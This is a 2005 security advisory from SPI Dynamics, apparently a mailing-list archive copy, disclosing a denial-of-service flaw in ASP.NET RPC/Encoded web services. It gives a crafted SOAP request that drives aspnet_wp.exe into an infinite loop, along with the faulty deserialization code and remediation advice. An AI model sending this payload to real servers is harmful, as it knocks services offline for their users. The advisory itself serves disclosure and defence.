ASP.NET RCP/Encoded Web service DOS

• Previous message: Dragos Ruiu: "PacSec/core05 Call For Papers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Mon, 11 Jul 2005 17:01:45 -0400
To: <pen-test@securityfocus.com>, <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>, <full-disclosure@lists.grok.org.uk>, <webappsec@securityfocus.com>

ASP.NET RCP/Encoded Web service DOS
http://www.spidynamics.com/spilabs/advisories/aspRCP.html

Release Date: July 11, 2005
Severity: High

[System Affected]
* IIS Servers exposing ASP.NET Web services that consume arrays in
RCP/Encoded mode
* Applications using System.Xml.Serialization to consume untrusted data
in RCP/Encoded mode

[Description]
We have found that by sending a custom SOAP message to an RCP/Encoded
web method which accepts an array (or any object derived from IList,
like StringCollection or ArrayList), we can cause the aspnet_wp.exe
process to consume 100% of the system resources. More than one request
may be required to create this condition on faster systems.

To replicate the issue, we can send a request to the Test(int[]
someList) web method defined inside the AspCrashWebService project
(refer to AspCrashWebService.zip distributed with this document). A
normal SOAP message to call this method with a single element of 0 would
look like:

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <tns:Test>
      <someList href="#id1" />
    </tns:Test>
    <soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
      <Item>0</Item>
    </soapenc:Array>
  </soap:Body>
</soap:Envelope>

If we change the <soapenc:Array> definition with the complex type
defined in our demo ASPCrashWebService.Service1 WSDL definition
(ArrayOfInt), we will cause the problem in aspnet_wp.exe.
Our new request would look like:

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <tns:Test>
      <someList href="#id1" />
    </tns:Test>
    <tns:ArrayOfInt>
      <Item>0</Item>
    </tns:ArrayOfint>
  </soap:Body>
</soap:Envelope>

We have found that the error is caused by an infinite loop inside
System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElemen
ts (). The method can be translated to the following code:

        protected void ReadReferencedElements()
        {
            string V_0;

            r.MoveToContent();
            while (r.NodeType != XmlNodeType.EndElement && r.NodeType !=
XmlNodeType.None)
            {
                ReadReferencingElement(null, null, true, out V_0);
                r.MoveToContent();
            }
            DoFixups();
            HandleUnreferencedObjects();
        }

The problem is that after the call to ReadRefencingElement() the
r.NodeType is set to XmlNodeType.Element and the while loop never
terminates.

[Remediation]
RCP/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming "Whidbey" release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation
will resume without problems.

[Credit]
Discovery: Bryan Sullivan
Research: Sacha Faust

Contact Information
spilabs@spidynamics.com
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700

SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.

• Previous message: Dragos Ruiu: "PacSec/core05 Call For Papers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]